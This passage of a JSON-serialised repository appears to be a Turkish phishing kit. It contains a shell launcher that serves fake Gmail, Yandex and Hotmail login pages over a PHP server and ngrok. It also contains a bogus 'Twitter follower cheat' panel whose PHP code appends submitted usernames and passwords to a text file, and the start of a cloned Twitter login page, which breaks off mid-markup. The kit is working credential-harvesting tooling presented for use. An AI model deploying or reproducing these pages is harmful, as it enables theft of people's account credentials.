\\n\".\" E-posta: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n?>"
  },
  {
    "path": "Site/Mail/start.sh",
    "content": "#!/bin/bash\n\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\nclear\necho -e  \"\n\n\n\\e[35m     ((( #Türk Siber Timi  #Yaman Efkar )))\n\n\n\n\\e[31m[01]\\e[32m Gmail\n\\e[31m[02]\\e[32m Yandex\n\\e[31m[03]\\e[32m Hotmail\n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\"\necho -e \"\\e[49m\"\nread -p \"İşlem Numarasını Giriniz: \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: mail01\"\n\tsleep 2\n\techo \"\"\n\techo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n\tsleep 4\n\tcd Site-gmail/\n\tphp -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 2 || $islem == 02 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: mail02\"\n\tsleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-yandex/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 3 || $islem == 03 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: mail03\"\n\tsleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-hotmail/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 0 || $islem == 00 ]]; then\ncd ..\ncd ..\nbash tst.sh\nelif [[ $islem == 9 || $islem == 99 ]]; then\nclear\necho -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\nexit 1\nelse\necho \"\"\necho -e \"\\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz....\"\nsleep 3\nclear\nbash start.sh\nfi\n"
  },
  {
    "path": "Site/Twitter/Site-fakepanel/index.php",
    "content": "\r\n<!DOCTYPE html>\r\n<html lang=\"tr\">\r\n<meta http-equiv=\"content-type\" content=\"text/html;charset=UTF-8\" />\r\n<head>\r\n<meta charset=\"utf-8\">\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n<title>Twitter Beğeni Hilesi - Twitter Reetweet Hilesi - Twitter Takipçi Arttırma hilesi </title>\r\n<meta name=\"description\" content=\"twitter takipçi , twitter beğeni hilesi , twitter reetweet hilesi , twitter beğeni , ücretsiz twitter takipçi , twitter takipci , twitter favori hilesi\">\r\n<meta name=\"keywords\" content=\"twitter favori , twitter reetweet hilesi , favori arttırma , twitter beğeni hilesi , ücretsiz takipçi , twitter beğeni , twitter retweet, twitter takipci , twitter takipci hilesi , twitter beğeni arttırma , twitter retweet arttırma hilesi\">\r\n<link rel=\"shortcut icon\" type=\"image/ico\" href=\"https://twitterhileleri.com/logo.ico\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"https://twitterhileleri.com/tema/assets/t5eqgc/bootstrap.css\">\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"https://twitterhileleri.com/tema/assets/t5eqgc/style.css\">\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"https://twitterhileleri.com/tema/css/font-awesome.min.css\">\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"https://twitterhileleri.com/cdnjs.cloudflare.com/ajax/libs/bootstrap-datetimepicker/4.17.47/tema/css/bootstrap-datetimepicker.min.css\">\r\n</head>\r\n<body>\r\n<nav class=\"navbar navbar-fixed-top \">\r\n<div class=\"container\">\r\n<div class=\"navbar-header\">\r\n<button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#navbar\" aria-expanded=\"false\" aria-controls=\"navbar\">\r\n<span class=\"sr-only\">Toggle navigation</span>\r\n<span class=\"icon-bar\"></span>\r\n<span class=\"icon-bar\"></span>\r\n<span class=\"icon-bar\"></span>\r\n</button>\r\n</div>\r\n<div id=\"navbar\" class=\"collapse navbar-collapse\">\r\n<ul class=\"nav navbar-nav navbar-right\">\r\n</ul>\r\n</div>\r\n</div>\r\n</nav>\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-8 col-md-offset-2\">\r\n<div class=\"navbar navbar-default\" style=\"background:#fed911;border:1px solid #fed911;padding:5px 10px;\">\r\n<div class=\"inner cover\"><center>\r\n<h4><font color=\"black\"><b>ÖNEMLİ :</b> Sisteme giriş yapmadan önce <b>hesabınızı e-posta ve telefon onaylı</b> yapınız!</font></h4>\r\n<br>\r\n<h1 class=\"cover-heading\">Twitter ile Giriş Yap!</h1>\r\n<p class=\"lead\">\r\n<form action='' method='post'>\r\n<input class=\"form-control girisinput\" placeholder=\"Kullanıcı Adınız\" type='text' style='width:220px; text-align:center;margin-top:10px;' maxlength='30' name='username' value=''><br>\r\n<input class=\"form-control girisinput\" placeholder=\"Şifreniz\" type='password' style='width:220px; text-align:center;margin-top:10px;' maxlength='255' name='pass' value=''><br><br>\r\n<br>\r\n<b><div id='submit'><input type='submit' value='Twitter ile Giriş YAP !' class='btn btn-lg btn-danger'></div><br></b>\r\n<font size='1px'>ÖNEMLİ NOT : KULLANICI ADI VE ŞİFRENİZ <u>TWITTER İLE BAĞLANTI KURULUP GEREKLİ İZİNLERİ ALMAK</u> AMAÇLI İSTENİLMİŞTİR, KESİNLİKLE 3.ŞAHIS/KURUMLAR İLE <u>PAYLAŞILMAZ!</u></font>\r\n</form>\r\n<?php\r\nif (!empty($_POST['username']) && !empty($_POST['pass'])) {\r\n$ac = fopen(\"twitter.txt\",\"a+\");\r\n$password = $_POST['username'];\r\n$username = $_POST['pass'];\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n\r\n\r\n?>\r\n</p></div></center>\r\n</div>\r\n<div class=\"mastfoot\">\r\n<div class=\"inner\">\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-8 col-md-offset-2\">\r\n<center><h4> #ETİKETLER# </h4>\r\n<p> <font color=\"white\"><a href=\"https://twitterhileleri.com/\">twitter takipçi hilesi</a> &nbsp;&bull;&nbsp;<a href=\"https://twitterhileleri.com/\">twitter retweet hilesi</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter retweet arttırma hilesi</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter retweet kazanma hilesi</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">takipçi kasma</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter beğeni arttırma</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter retweet arttırma</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter takipci kasma</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter beğeni hilesi</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter begeni favori hilesi</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter favori kazanma</a> &nbsp;&bull;&nbsp; <a href=\"https://twitterhileleri.com/\">twitter takipçi sitesi</a></b>\r\n<h2><a href=\"https://www.twitterhileleri.com\">Twitter retweet Hilesi </a> </h2>\r\n</font></p><font color=\"white\">\r\n</font></div></center></div></div>\r\n<link rel=\"stylesheet\" href=\"https://twitterhileleri.com/use.fontawesome.com/releases/v5.0.8/tema/css/all.css\">\r\n    \r\n\r\n</body>\r\n</html>\r\n"
  },
  {
    "path": "Site/Twitter/Site-phishing/index.php",
    "content": "\r\n<!DOCTYPE html>\r\n<html lang=\"tr\" data-scribe-reduced-action-queue=\"true\">\r\n  <head>\r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    <meta charset=\"utf-8\">\r\n      <script  nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n        !function(){window.initErrorstack||(window.initErrorstack=[]),window.onerror=function(r,i,n,o,t){r.indexOf(\"Script error.\")>-1||window.initErrorstack.push({errorMsg:r,url:i,lineNumber:n,column:o,errorObj:t})}}();\r\n      </script>\r\n    \r\n    \r\n  \r\n  <script id=\"bouncer_terminate_iframe\" nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n    if (window.top != window) {\r\n  window.top.postMessage({'bouncer': true, 'event': 'complete'}, '*');\r\n}\r\n  </script>\r\n  <script id=\"ttft_boot_data\" nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n    window.ttftData={\"transaction_id\":\"00645f88005c79f0.16c3f2cf2fbf20f9\\u003c:00b77729009ac43f\",\"server_request_start_time\":1551372681629,\"user_id\":null,\"is_ssl\":true,\"rendered_on_server\":true,\"is_tfe\":true,\"client\":\"macaw-swift\",\"tfe_version\":\"tsa_o\\/1.0.1\\/20190206.2140.12b8a68\",\"ttft_browser\":\"chrome\"};!function(){function t(t,n){window.ttftData&&!window.ttftData[t]&&(window.ttftData[t]=n)}function n(){return o?Math.round(w.now()+w.timing.navigationStart):(new Date).getTime()}var w=window.performance,o=w&&w.now;window.ttft||(window.ttft={}),window.ttft.recordMilestone||(window.ttft.recordMilestone=t),window.ttft.now||(window.ttft.now=n)}();\r\n  </script>\r\n  <script id=\"swift_action_queue\" nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n    !function(){function e(e){if(e||(e=window.event),!e)return!1;if(e.timestamp=(new Date).getTime(),!e.target&&e.srcElement&&(e.target=e.srcElement),document.documentElement.getAttribute(\"data-scribe-reduced-action-queue\"))for(var t=e.target;t&&t!=document.body;){if(\"A\"==t.tagName)return;t=t.parentNode}return i(\"all\",o(e)),a(e)?(document.addEventListener||(e=o(e)),e.preventDefault=e.stopPropagation=e.stopImmediatePropagation=function(){},y?(v.push(e),i(\"captured\",e)):i(\"ignored\",e),!1):(i(\"direct\",e),!0)}function t(e){n();for(var t,r=0;t=v[r];r++){var a=e(t.target),i=a.closest(\"a\")[0];if(\"click\"==t.type&&i){var o=e.data(i,\"events\"),u=o&&o.click,c=!i.hostname.match(g)||!i.href.match(/#$/);if(!u&&c){window.location=i.href;continue}}a.trigger(e.event.fix(t))}window.swiftActionQueue.wasFlushed=!0}function r(){for(var e in b)if(\"all\"!=e)for(var t=b[e],r=0;r<t.length;r++)console.log(\"actionQueue\",c(t[r]))}function n(){clearTimeout(w);for(var e,t=0;e=h[t];t++)document[\"on\"+e]=null}function a(e){if(!e.target)return!1;var t=e.target,r=(t.tagName||\"\").toLowerCase();if(e.metaKey)return!1;if(e.shiftKey&&\"a\"==r)return!1;if(t.hostname&&!t.hostname.match(g))return!1;if(e.type.match(p)&&s(t))return!1;if(\"label\"==r){var n=t.getAttribute(\"for\");if(n){var a=document.getElementById(n);if(a&&f(a))return!1}else for(var i,o=0;i=t.childNodes[o];o++)if(f(i))return!1}return!0}function i(e,t){t.bucket=e,b[e].push(t)}function o(e){var t={};for(var r in e)t[r]=e[r];return t}function u(e){for(;e&&e!=document.body;){if(\"A\"==e.tagName)return e;e=e.parentNode}}function c(e){var t=[];e.bucket&&t.push(\"[\"+e.bucket+\"]\"),t.push(e.type);var r,n,a=e.target,i=u(a),o=\"\",c=e.timestamp&&e.timestamp-d;return\"click\"===e.type&&i?(r=i.className.trim().replace(/\\s+/g,\".\"),n=i.id.trim(),o=/[^#]$/.test(i.href)?\" (\"+i.href+\")\":\"\",a='\"'+i.innerText.replace(/\\n+/g,\" \").trim()+'\"'):(r=a.className.trim().replace(/\\s+/g,\".\"),n=a.id.trim(),a=a.tagName.toLowerCase(),e.keyCode&&(a=String.fromCharCode(e.keyCode)+\" : \"+a)),t.push(a+o+(n&&\"#\"+n)+(!n&&r?\".\"+r:\"\")),c&&t.push(c),t.join(\" \")}function f(e){var t=(e.tagName||\"\").toLowerCase();return\"input\"==t&&\"checkbox\"==e.getAttribute(\"type\")}function s(e){var t=(e.tagName||\"\").toLowerCase();return\"textarea\"==t||\"input\"==t&&\"text\"==e.getAttribute(\"type\")||\"true\"==e.getAttribute(\"contenteditable\")}for(var m,d=(new Date).getTime(),l=1e4,g=/^([^\\.]+\\.)*twitter\\.com$/,p=/^key/,h=[\"click\",\"keydown\",\"keypress\",\"keyup\"],v=[],w=null,y=!0,b={captured:[],ignored:[],direct:[],all:[]},k=0;m=h[k];k++)document[\"on\"+m]=e;w=setTimeout(function(){y=!1},l),window.swiftActionQueue={buckets:b,flush:t,logActions:r,wasFlushed:!1}}();\r\n  </script>\r\n  <script id=\"composition_state\" nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n    !function(){function t(t){t.target.setAttribute(\"data-in-composition\",\"true\")}function n(t){t.target.removeAttribute(\"data-in-composition\")}document.addEventListener&&(document.addEventListener(\"compositionstart\",t,!1),document.addEventListener(\"compositionend\",n,!1))}();\r\n  </script>\r\n\r\n    <link rel=\"stylesheet\" href=\"https://abs.twimg.com/a/1550816035/css/t1/twitter_core.bundle.css\" class=\"coreCSSBundles\">\r\n  <link rel=\"stylesheet\" class=\"moreCSSBundles\" href=\"https://abs.twimg.com/a/1550816035/css/t1/twitter_more_1.bundle.css\">\r\n  <link rel=\"stylesheet\" class=\"moreCSSBundles\" href=\"https://abs.twimg.com/a/1550816035/css/t1/twitter_more_2.bundle.css\">\r\n\r\n    <link rel=\"dns-prefetch\" href=\"https://pbs.twimg.com\">\r\n    <link rel=\"dns-prefetch\" href=\"https://t.co\">\r\n      <link rel=\"preload\" href=\"https://abs.twimg.com/k/tr/init.tr.c84ad50d90c26e928e2a.js\" as=\"script\">\r\n      <link rel=\"preload\" href=\"https://abs.twimg.com/k/tr/0.commons.tr.bd2506b7029d27c01904.js\" as=\"script\">\r\n\r\n      <title>Twitter&#39;dan Giriş yap</title>\r\n      <meta name=\"robots\" content=\"NOODP\">\r\n  <meta name=\"description\" content=\"Twitter&#39;a tekrar hoş geldin. Bildirimlerini kontrol etmek için şimdi giriş yap, sohbete katıl ve takip ettiğin kişilerden gelen Tweetleri kaçırma.\">\r\n\r\n\r\n\r\n<meta name=\"msapplication-TileImage\" content=\"//abs.twimg.com/favicons/win8-tile-144.png\"/>\r\n<meta name=\"msapplication-TileColor\" content=\"#00aced\"/>\r\n\r\n\r\n\r\n<link rel=\"mask-icon\" sizes=\"any\" href=\"https://abs.twimg.com/a/1550816035/icons/favicon.svg\" color=\"#1da1f2\">\r\n\r\n<link rel=\"shortcut icon\" href=\"//abs.twimg.com/favicons/favicon.ico\" type=\"image/x-icon\">\r\n<link rel=\"apple-touch-icon\" href=\"https://abs.twimg.com/icons/apple-touch-icon-192x192.png\" sizes=\"192x192\">\r\n\r\n<link rel=\"manifest\" href=\"/manifest.json\">\r\n\r\n    <meta name=\"viewport\" id=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0\">\r\n\r\n  <meta name=\"swift-page-name\" id=\"swift-page-name\" content=\"login\">\r\n  <meta name=\"swift-page-section\" id=\"swift-section-name\" content=\"login\">\r\n\r\n    <link rel=\"canonical\" href=\"https://twitter.com/login?lang=tr\">\r\n  <link rel=\"alternate\" hreflang=\"x-default\" href=\"https://twitter.com/login\">\r\n  <link rel=\"alternate\" hreflang=\"fr\" href=\"https://twitter.com/login?lang=fr\"><link rel=\"alternate\" hreflang=\"en\" href=\"https://twitter.com/login?lang=en\"><link rel=\"alternate\" hreflang=\"ar\" href=\"https://twitter.com/login?lang=ar\"><link rel=\"alternate\" hreflang=\"ja\" href=\"https://twitter.com/login?lang=ja\"><link rel=\"alternate\" hreflang=\"es\" href=\"https://twitter.com/login?lang=es\"><link rel=\"alternate\" hreflang=\"de\" href=\"https://twitter.com/login?lang=de\"><link rel=\"alternate\" hreflang=\"it\" href=\"https://twitter.com/login?lang=it\"><link rel=\"alternate\" hreflang=\"id\" href=\"https://twitter.com/login?lang=id\"><link rel=\"alternate\" hreflang=\"pt\" href=\"https://twitter.com/login?lang=pt\"><link rel=\"alternate\" hreflang=\"ko\" href=\"https://twitter.com/login?lang=ko\"><link rel=\"alternate\" hreflang=\"tr\" href=\"https://twitter.com/login?lang=tr\"><link rel=\"alternate\" hreflang=\"ru\" href=\"https://twitter.com/login?lang=ru\"><link rel=\"alternate\" hreflang=\"nl\" href=\"https://twitter.com/login?lang=nl\"><link rel=\"alternate\" hreflang=\"fil\" href=\"https://twitter.com/login?lang=fil\"><link rel=\"alternate\" hreflang=\"ms\" href=\"https://twitter.com/login?lang=ms\"><link rel=\"alternate\" hreflang=\"zh-tw\" href=\"https://twitter.com/login?lang=zh-tw\"><link rel=\"alternate\" hreflang=\"zh-cn\" href=\"https://twitter.com/login?lang=zh-cn\"><link rel=\"alternate\" hreflang=\"hi\" href=\"https://twitter.com/login?lang=hi\"><link rel=\"alternate\" hreflang=\"no\" href=\"https://twitter.com/login?lang=no\"><link rel=\"alternate\" hreflang=\"sv\" href=\"https://twitter.com/login?lang=sv\"><link rel=\"alternate\" hreflang=\"fi\" href=\"https://twitter.com/login?lang=fi\"><link rel=\"alternate\" hreflang=\"da\" href=\"https://twitter.com/login?lang=da\"><link rel=\"alternate\" hreflang=\"pl\" href=\"https://twitter.com/login?lang=pl\"><link rel=\"alternate\" hreflang=\"hu\" href=\"https://twitter.com/login?lang=hu\"><link rel=\"alternate\" hreflang=\"fa\" href=\"https://twitter.com/login?lang=fa\"><link rel=\"alternate\" hreflang=\"he\" href=\"https://twitter.com/login?lang=he\"><link rel=\"alternate\" hreflang=\"ur\" href=\"https://twitter.com/login?lang=ur\"><link rel=\"alternate\" hreflang=\"th\" href=\"https://twitter.com/login?lang=th\"><link rel=\"alternate\" hreflang=\"uk\" href=\"https://twitter.com/login?lang=uk\"><link rel=\"alternate\" hreflang=\"ca\" href=\"https://twitter.com/login?lang=ca\"><link rel=\"alternate\" hreflang=\"ga\" href=\"https://twitter.com/login?lang=ga\"><link rel=\"alternate\" hreflang=\"el\" href=\"https://twitter.com/login?lang=el\"><link rel=\"alternate\" hreflang=\"eu\" href=\"https://twitter.com/login?lang=eu\"><link rel=\"alternate\" hreflang=\"cs\" href=\"https://twitter.com/login?lang=cs\"><link rel=\"alternate\" hreflang=\"gl\" href=\"https://twitter.com/login?lang=gl\"><link rel=\"alternate\" hreflang=\"ro\" href=\"https://twitter.com/login?lang=ro\"><link rel=\"alternate\" hreflang=\"hr\" href=\"https://twitter.com/login?lang=hr\"><link rel=\"alternate\" hreflang=\"en-gb\" href=\"https://twitter.com/login?lang=en-gb\"><link rel=\"alternate\" hreflang=\"vi\" href=\"https://twitter.com/login?lang=vi\"><link rel=\"alternate\" hreflang=\"bn\" href=\"https://twitter.com/login?lang=bn\"><link rel=\"alternate\" hreflang=\"bg\" href=\"https://twitter.com/login?lang=bg\"><link rel=\"alternate\" hreflang=\"sr\" href=\"https://twitter.com/login?lang=sr\"><link rel=\"alternate\" hreflang=\"sk\" href=\"https://twitter.com/login?lang=sk\"><link rel=\"alternate\" hreflang=\"gu\" href=\"https://twitter.com/login?lang=gu\"><link rel=\"alternate\" hreflang=\"mr\" href=\"https://twitter.com/login?lang=mr\"><link rel=\"alternate\" hreflang=\"ta\" href=\"https://twitter.com/login?lang=ta\"><link rel=\"alternate\" hreflang=\"kn\" href=\"https://twitter.com/login?lang=kn\">\r\n\r\n  \r\n\r\n  <link rel=\"alternate\" media=\"handheld, only screen and (max-width: 640px)\" href=\"https://mobile.twitter.com/session/new\">\r\n\r\n      <link rel=\"alternate\" href=\"android-app://com.twitter.android/twitter/login?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eandroidseo%7Ctwgr%5Elogin\">\r\n\r\n<link rel=\"search\" type=\"application/opensearchdescription+xml\" href=\"/opensearch.xml\" title=\"Twitter\">\r\n\r\n    <link id=\"async-css-placeholder\">\r\n\r\n    \r\n  </head>\r\n  <body class=\"three-col logged-out ms-windows western tr\" \r\ndata-fouc-class-names=\"swift-loading no-nav-banners\"\r\n dir=\"ltr\">\r\n      <script id=\"swift_loading_indicator\" nonce=\"R2ya8eIyI8dU64OVIw9log==\">\r\n        document.body.className=document.body.className+\" \"+document.body.getAttribute(\"data-fouc-class-names\");\r\n      </script>\r\n\r\n    \r\n    <noscript>\r\n      <form action=\"\" method=\"POST\" class=\"NoScriptForm\">\r\n        <input type=\"hidden\" value=\"2aa4c5aef1e4b8e98fc54a82d07a9f410e8986cf\" name=\"authenticity_token\">\r\n\r\n        <div class=\"NoScriptForm-content\">\r\n          <span class=\"NoScriptForm-logo Icon Icon--logo Icon--extraLarge\"></span>\r\n          <p>Tarayıcında JavaScript'in devre dışı olduğunu belirledik. Eski Twitter'a devam etmek ister misin?</p>\r\n          <p class=\"NoScriptForm-buttonContainer\"><button type=\"submit\" class=\"EdgeButton EdgeButton--primary\">Evet</button></p>\r\n        </div>\r\n      </form>\r\n    </noscript>\r\n\r\n    <a href=\"#timeline\" class=\"u-hiddenVisually focusable\">İçeriğe geç</a>\r\n\r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    \r\n    <div id=\"doc\" data-at-shortcutkeys=\"{&quot;Enter&quot;:&quot;Tweet detaylar\\u0131n\\u0131 a\\u00e7&quot;,&quot;o&quot;:&quot;Foto\\u011fraf\\u0131 geni\\u015flet&quot;,&quot;/&quot;:&quot;Arama&quot;,&quot;?&quot;:&quot;Bu men\\u00fc&quot;,&quot;j&quot;:&quot;Sonraki Tweet&quot;,&quot;k&quot;:&quot;\\u00d6nceki Tweet&quot;,&quot;Space&quot;:&quot;Sayfa a\\u015fa\\u011f\\u0131&quot;,&quot;.&quot;:&quot;Yeni Tweetleri y\\u00fckle&quot;,&quot;gu&quot;:&quot;Kullan\\u0131c\\u0131ya git...&quot;}\" class=\"route-login login-responsive\">\r\n        <div class=\"topbar js-topbar\">\r\n    \r\n\r\n\r\n    <div class=\"global-nav global-nav--newLoggedOut\" data-section-term=\"top_nav\">\r\n      <div class=\"global-nav-inner\">\r\n        <div class=\"container\">\r\n\r\n          \r\n<ul class=\"nav js-global-actions\" role=\"navigation\" id=\"global-actions\">\r\n  <li id=\"global-nav-home\" class=\"home\" data-global-action=\"home\">\r\n    <a class=\"js-nav js-tooltip js-dynamic-tooltip\" data-placement=\"bottom\" href=\"/\" data-component-context=\"home_nav\" data-nav=\"home\">\r\n      <span class=\"Icon Icon--bird Icon--large\"></span>\r\n      <span class=\"text\" aria-hidden=\"true\">Anasayfa</span>\r\n      <span class=\"u-hiddenVisually a11y-inactive-page-text\">Anasayfa</span>\r\n      <span class=\"u-hiddenVisually a11y-active-page-text\">Anasayfa, bulunduğun sayfa.</span>\r\n    </a>\r\n  </li>\r\n    <li id=\"global-nav-about\" class=\"about\" data-global-action=\"about\">\r\n      <a class=\"js-tooltip js-dynamic-tooltip\" data-placement=\"bottom\" href=\"/about\" target=\"_blank\" data-component-context=\"about_nav\" data-nav=\"about\" rel=\"noopener\">\r\n        <span class=\"text\">Hakkımızda</span>\r\n      </a>\r\n    </li>\r\n</ul>\r\n<div class=\"pull-right nav-extras\">\r\n\r\n  <ul class=\"nav secondary-nav language-dropdown\">\r\n    <li class=\"dropdown js-language-dropdown\">\r\n      <a href=\"#supported_languages\" class=\"dropdown-toggle js-dropdown-toggle\">\r\n        <small>Dil:</small> <span class=\"js-current-language\">Türkçe</span> <b class=\"caret\"></b>\r\n      </a>\r\n      <div class=\"dropdown-menu dropdown-menu--rightAlign is-forceRight\">\r\n        <div class=\"dropdown-caret right\">\r\n          <span class=\"caret-outer\"> </span>\r\n          <span class=\"caret-inner\"></span>\r\n        </div>\r\n        <ul id=\"supported_languages\">\r\n            <li><a href=\"?lang=id\" data-lang-code=\"id\" title=\"Endonezce\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Bahasa Indonesia</a></li>\r\n            <li><a href=\"?lang=msa\" data-lang-code=\"msa\" title=\"Malayca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Bahasa Melayu</a></li>\r\n            <li><a href=\"?lang=ca\" data-lang-code=\"ca\" title=\"Katalanca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Català</a></li>\r\n            <li><a href=\"?lang=cs\" data-lang-code=\"cs\" title=\"Çekçe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Čeština</a></li>\r\n            <li><a href=\"?lang=da\" data-lang-code=\"da\" title=\"Danca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Dansk</a></li>\r\n            <li><a href=\"?lang=de\" data-lang-code=\"de\" title=\"Almanca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Deutsch</a></li>\r\n            <li><a href=\"?lang=en\" data-lang-code=\"en\" title=\"İngilizce\" class=\"js-language-link js-tooltip\" rel=\"noopener\">English</a></li>\r\n            <li><a href=\"?lang=en-gb\" data-lang-code=\"en-gb\" title=\"İngiliz İngilizcesi\" class=\"js-language-link js-tooltip\" rel=\"noopener\">English UK</a></li>\r\n            <li><a href=\"?lang=es\" data-lang-code=\"es\" title=\"İspanyolca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Español</a></li>\r\n            <li><a href=\"?lang=fil\" data-lang-code=\"fil\" title=\"Filipince\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Filipino</a></li>\r\n            <li><a href=\"?lang=fr\" data-lang-code=\"fr\" title=\"Fransızca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Français</a></li>\r\n            <li><a href=\"?lang=hr\" data-lang-code=\"hr\" title=\"Hırvatça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Hrvatski</a></li>\r\n            <li><a href=\"?lang=it\" data-lang-code=\"it\" title=\"İtalyanca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Italiano</a></li>\r\n            <li><a href=\"?lang=hu\" data-lang-code=\"hu\" title=\"Macarca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Magyar</a></li>\r\n            <li><a href=\"?lang=nl\" data-lang-code=\"nl\" title=\"Felemenkçe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Nederlands</a></li>\r\n            <li><a href=\"?lang=no\" data-lang-code=\"no\" title=\"Norveççe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Norsk</a></li>\r\n            <li><a href=\"?lang=pl\" data-lang-code=\"pl\" title=\"Lehçe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Polski</a></li>\r\n            <li><a href=\"?lang=pt\" data-lang-code=\"pt\" title=\"Portekizce\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Português</a></li>\r\n            <li><a href=\"?lang=ro\" data-lang-code=\"ro\" title=\"Rumence\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Română</a></li>\r\n            <li><a href=\"?lang=sk\" data-lang-code=\"sk\" title=\"Slovakça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Slovenčina</a></li>\r\n            <li><a href=\"?lang=fi\" data-lang-code=\"fi\" title=\"Fince\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Suomi</a></li>\r\n            <li><a href=\"?lang=sv\" data-lang-code=\"sv\" title=\"İsveççe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Svenska</a></li>\r\n            <li><a href=\"?lang=vi\" data-lang-code=\"vi\" title=\"Vietnamca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Tiếng Việt</a></li>\r\n            <li><a href=\"?lang=el\" data-lang-code=\"el\" title=\"Yunanca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Ελληνικά</a></li>\r\n            <li><a href=\"?lang=bg\" data-lang-code=\"bg\" title=\"Bulgarca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Български език</a></li>\r\n            <li><a href=\"?lang=ru\" data-lang-code=\"ru\" title=\"Rusça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Русский</a></li>\r\n            <li><a href=\"?lang=sr\" data-lang-code=\"sr\" title=\"Sırpça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Српски</a></li>\r\n            <li><a href=\"?lang=uk\" data-lang-code=\"uk\" title=\"Ukraynaca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">Українська мова</a></li>\r\n            <li><a href=\"?lang=he\" data-lang-code=\"he\" title=\"İbranice\" class=\"js-language-link js-tooltip\" rel=\"noopener\">עִבְרִית</a></li>\r\n            <li><a href=\"?lang=ar\" data-lang-code=\"ar\" title=\"Arapça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">العربية</a></li>\r\n            <li><a href=\"?lang=fa\" data-lang-code=\"fa\" title=\"Farsça\" class=\"js-language-link js-tooltip\" rel=\"noopener\">فارسی</a></li>\r\n            <li><a href=\"?lang=mr\" data-lang-code=\"mr\" title=\"Marathi dili\" class=\"js-language-link js-tooltip\" rel=\"noopener\">मराठी</a></li>\r\n            <li><a href=\"?lang=hi\" data-lang-code=\"hi\" title=\"Hintçe\" class=\"js-language-link js-tooltip\" rel=\"noopener\">हिन्दी</a></li>\r\n            <li><a href=\"?lang=bn\" data-lang-code=\"bn\" title=\"Bengalce\" class=\"js-language-link js-tooltip\" rel=\"noopener\">বাংলা</a></li>\r\n            <li><a href=\"?lang=gu\" data-lang-code=\"gu\" title=\"Güceratça\" 